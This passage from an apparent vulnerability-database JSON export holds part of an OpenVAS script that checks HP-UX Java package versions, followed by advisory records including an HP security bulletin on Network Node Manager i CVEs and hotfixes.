revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", 
rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", 
rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "naslFamily": "HP-UX Local Security Checks"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "No description provided", "edition": 1, "modified": "2011-09-20T00:00:00", "published": "2011-09-20T00:00:00", "id": "SECURITYVULNS:VULN:11915", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11915", "title": "HP Network Node Manager i DoS", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03005726\r\nVersion: 1\r\n\r\nHPSBMU02703 SSRT100242 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Disclosure of Information, Unauthorized Modification\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-09-12\r\nLast Updated: 2011-09-12\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized disclosure of information, unauthorized modification\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. 
The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS), unauthorized disclosure of information, and unauthorized modification.\r\n\r\nReferences: CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Network Node Manager i (NNMi) v8.1x and v9.0x for HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3867 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3868 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3869 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3871 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3872 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3873 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3874 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2009-3875 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\r\nCVE-2009-3876 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2009-3877 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made a hotfixes available to resolve these vulnerabilities for NNMi v9.0x and NNMi v8.1x. 
The hotfixes can be obtained by contacting the normal HP Services support channel.\r\n\r\nFor NNMi 9.0x\r\n\r\nOperating System\r\n Hotfix Identifier\r\n\r\nHP-UX\r\n QCCR1B90090\r\n\r\nLinux\r\n QCCR1B90091\r\n\r\nSolaris\r\n QCCR1B90092\r\n\r\nWindows\r\n QCCR1B90093\r\n\r\nNNMi v9.0x Required Patches\r\n\r\nNote: Before installing the hotfix on NNMi v9.0x insure that the following patches have been installed.\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX\r\n PHSS_41982\r\n\r\nLinux\r\n NNM900L_00004\r\n\r\nSolaris\r\n NNM900S_00004\r\n\r\nWindows\r\n NNM900W_00004\r\n\r\nFor NNMi 8.1x\r\n\r\nNNMi Version\r\n Hotfix Identifier\r\n\r\nNNMi v8.1x\r\n QCCR1B45223\r\n\r\nNNMi v8.1x Required Patches\r\n\r\nNote: Before installing the hotfix on NNMi v8.1x insure that the following patches have been installed.\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX\r\n PHSS_41147\r\n\r\nLinux\r\n NNM810L_00009\r\n\r\nSolaris\r\n NNM810S_00009\r\n\r\nWindows\r\n NNM810W_00009\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\n\r\nInstall appropriate hotfix after installing the required patch.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. 
For more information see: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX NNMi v9.0x\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\n=============\r\nHPOvNNM.HPNMSJBOSS\r\naction: install the QCCR1B90090 hotfix after installing the required patch\r\n\r\nFor HP-UX NNMi v8.1x\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\n=============\r\nHPOvNNM.HPNMSJBOSS\r\naction: install the QCCR1B45223 hotfix after installing the required patch\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 12 September 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. 
The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk5uIHYACgkQ4B86/C0qfVlPDgCdFeqfoaamrARzUiqlpSuWFvK8\r\nFLgAnRIzmRNNn78sy7TyYJHPjgPHObei\r\n=y8+8\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-09-20T00:00:00", "published": "2011-09-20T00:00:00", "id": "SECURITYVULNS:DOC:27037", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27037", "title": "[security bulletin] HPSBMU02703 SSRT100242 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Disclosure of Information, Unauthorized Modification", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3885", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "Multiple buffer overflows and code executions.", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00",
"id": "SECURITYVULNS:VULN:10369", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10369", "title": "Sun Java multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.", "modified": "2019-04-29T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:1361412562310800975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800975", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (LinUx)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
